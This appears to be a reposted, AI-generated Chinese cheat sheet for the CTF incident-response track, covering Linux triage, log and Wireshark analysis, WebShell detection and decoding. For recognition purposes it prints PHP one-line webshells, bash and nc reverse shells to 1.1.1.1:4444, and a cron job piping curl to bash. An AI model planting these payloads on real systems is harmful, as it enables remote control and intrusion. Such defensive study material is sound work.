当前位置: 首页 > news >正文

ctf_运维赛道离线资料库_分类整理版(ai生成)

CTF 运维赛道离线资料库(分类整理版)

适用于:

  • GZCTF
  • 网络安全运维赛道
  • Linux 应急响应
  • 流量分析
  • 日志分析
  • 离线比赛环境

建议:

  • 比赛前提前保存到本地
  • 配合 Typora / VSCode 使用
  • 支持全文搜索

一、Linux 应急响应


1. 信息收集

当前用户

whoami

当前目录

pwd

IP 地址

ip addr

查看系统版本

cat /etc/os-release

查看内核

uname -a

2. 进程排查

查看进程树

ps auxf

CPU 占用最高

ps aux --sort=-%cpu | head

内存占用最高

ps aux --sort=-%mem | head

查找 bash 反弹 shell

grep -R "/dev/tcp/" /

3. 网络排查

查看监听端口

ss -antpl

或:

netstat -antpl

查看网络连接

lsof -i -P -n

4. 登录日志

最近登录

last

登录失败

Ubuntu:

grep "Failed password" /var/log/auth.log

CentOS:

grep "Failed password" /var/log/secure

5. 计划任务排查

当前用户

crontab -l

系统计划任务

cat /etc/crontab

6. WebShell 排查

查找 eval

grep -R "eval(" /var/www

查找 base64_decode

grep -R "base64_decode" /var/www

查找 system

grep -R "system(" /var/www

二、日志分析


1. Nginx 日志

日志位置

/var/log/nginx/access.log

查找 SQL 注入

grep -Ei "union|sleep|benchmark|select" access.log

查找 WebShell 上传

grep ".php" access.log

2. SSH 日志

Ubuntu:

/var/log/auth.log

CentOS:

/var/log/secure

查找成功登录

grep "Accepted password" /var/log/auth.log

查找失败登录

grep "Failed password" /var/log/auth.log

3. 日志分析例子

例子:发现 SQL 注入

日志

GET /index.php?id=1 union select 1,2,3

分析

关键词:

union select

说明:

SQL 注入

例子:发现命令执行

日志

GET /index.php?cmd=cat+/etc/passwd

分析

URL 解码:

+
=
空格

恢复:

cat /etc/passwd

三、流量分析(Wireshark)


1. 常用过滤器

HTTP

http

DNS

dns

TCP

tcp

SMTP

smtp

2. Follow TCP Stream

比赛最高频操作:

右键数据包
→ Follow
→ TCP Stream

3. 流量分析例子

SMTP 邮件题

数据包

RCPT TO:<test@ctf.com>

答案

test@ctf.com

Basic Auth

数据包

Authorization: Basic YWRtaW46MTIzNDU2

解码

echo YWRtaW46MTIzNDU2 | base64 -d

结果

admin:123456

四、WebShell 与恶意代码


1. PHP 一句话木马

<?php eval($_POST['cmd']); ?>

危险函数:

eval

2. Base64 木马

<?php eval(base64_decode($_POST['a'])); ?>

3. system 命令执行

<?php system($_GET['cmd']); ?>

4. 常见危险函数

eval
assert
system
exec
shell_exec
passthru
base64_decode

五、Linux 高危行为


1. 反弹 Shell

Bash

bash -i >& /dev/tcp/1.1.1.1/4444 0>&1

nc

nc -e /bin/bash 1.1.1.1 4444

2. 挖矿程序

高频:

xmrig

特点:

  • CPU 极高
  • 长连接
  • 隐藏进程

3. 恶意计划任务

*/1 * * * * curl http://1.1.1.1/shell.sh | bash

危险点:

curl | bash

六、比赛高频命令


grep

搜索 flag

grep -R "flag" /

搜索 password

grep -R "password" .

find

查找 php 文件

find / -name "*.php"

最近修改文件

find /var/www -mtime -1

curl

测试 HTTP

curl http://127.0.0.1

md5

计算 MD5

md5sum test.jpg

七、编码解码


1. Base64

编码

echo test | base64

解码

echo dGVzdA== | base64 -d

2. URL 解码

import urllib.parse
print(urllib.parse.unquote('%2fetc%2fpasswd'))

3. Hex 解码

echo 74657374 | xxd -r -p

八、比赛快速思路


拿到服务器先看

whoami
ip addr
ps auxf
ss -antpl
crontab -l
last

Web 题重点目录

/var/www
/www/wwwroot
/usr/share/nginx/html

高危日志

/var/log/auth.log
/var/log/secure
/var/log/nginx/access.log

比赛核心

日志分析
+
流量分析
+
Linux 运维
+
应急响应

真正核心

找异常
找字符串
找端口
找进程
找计划任务

九、推荐离线工具


Windows

  • Wireshark
  • BurpSuite
  • VSCode
  • Notepad++
  • Python
  • Git
  • WSL

Linux

  • tcpdump
  • tshark
  • curl
  • jq
  • net-tools

十、最终建议

比赛很多题本质:

不是渗透
而是排查

真正高频:

grep
find
cat
curl
ps
netstat
ss

比赛时:

先拿基础分
再做复杂题
http://www.jsqmd.com/news/817796/

相关文章:

  • 3步搭建你的无人机远程识别系统:ArduRemoteID完全指南
  • 2026 沐浴露推荐合集!不同肤质全适配,从平价到大牌都有 - 资讯焦点
  • 选择题第一版本(ai生成)
  • WarcraftHelper高效优化指南:全面解锁魔兽争霸III现代化体验
  • 深度学习优化算法(二)—— SGD + Momentum + Nesterov(三十四)
  • 用FactoryIO和西门子S7-PLCSIM V17搞定智能仓储仿真:从数组下标变量化到故障排查全记录
  • 收藏这篇就够了!全网最全网络安全挖洞平台汇总,小白入门必备指南
  • DeepSeek容器冷启动耗时超8秒?——实时追踪strace+eBPF定位glibc加载瓶颈(实测优化至1.2秒)
  • 白城招聘软件哪个好:秒聘网行业精英 - 13425704091
  • FPGA行业竞争格局演变:从器件性能到系统价值的战略升维
  • 跨镜追踪·空间重构:镜像视界Camera Graph™定义全域连续追踪新范式
  • 2026年5月河北橡胶支座/橡胶止水带/桥梁伸缩缝厂家哪家好,认准河北先创工程橡胶有限公司 - 2026年企业推荐榜
  • 2026 长辈精油全网热门实测 TOP6!成分安全效果好,不踩雷不翻车 - 资讯焦点
  • 滨州招聘网站哪个靠谱:秒聘网专业可信 - 17322238651
  • 白城招聘软件哪个靠谱:秒聘网稳靠专业 - 13724980961
  • 用C语言解决这些经典问题:逆序数字、念整数、多项式加法,面试官都爱问
  • Pandas时间序列基石:从零掌握Timestamp类型创建与核心转换
  • Midjourney v7到底值不值得升级?基于1,842次A/B测试的权威性能报告(含渲染速度/一致性/细节还原率三维度)
  • 浩卡联盟号卡分销代理权益保障与官方邀请码规范使用公告|官方唯一邀请码12345 - 资讯焦点
  • 27 岁裸辞跨行转网安!传统行业转型实录,这条路我已经踩平了
  • 大麦网自动抢票完整指南:告别手忙脚乱,5分钟搭建智能抢票系统
  • 通过curl命令直接测试Taotoken多模型API的连通性与响应
  • FlowMix-Flow:统一编排异构数据流与工作流的开源平台实践
  • WeChatExporter终极教程:三步永久保存你的微信聊天记录
  • 祝贺“HP惠普”键盘,鼠标荣获美国人体工程学 USergo 权威认证 - 资讯焦点
  • 2026年5月解密安徽顶尖空气流量计/空气流量传感器/点火线圈/新能源车空调压缩机/直销工厂的供应链实力与选型逻辑 - 2026年企业推荐榜
  • G.711 A律编码:为什么你的VoIP通话在安静时清晰,吵闹时却失真?
  • 【实战】基于STM32 LL库的INA3221三通道电流电压监测驱动开发与优化
  • 销售资料包智能生成(使用千问)
  • Astro 5 + Tailwind CSS v4 构建极速静态营销页面的工程实践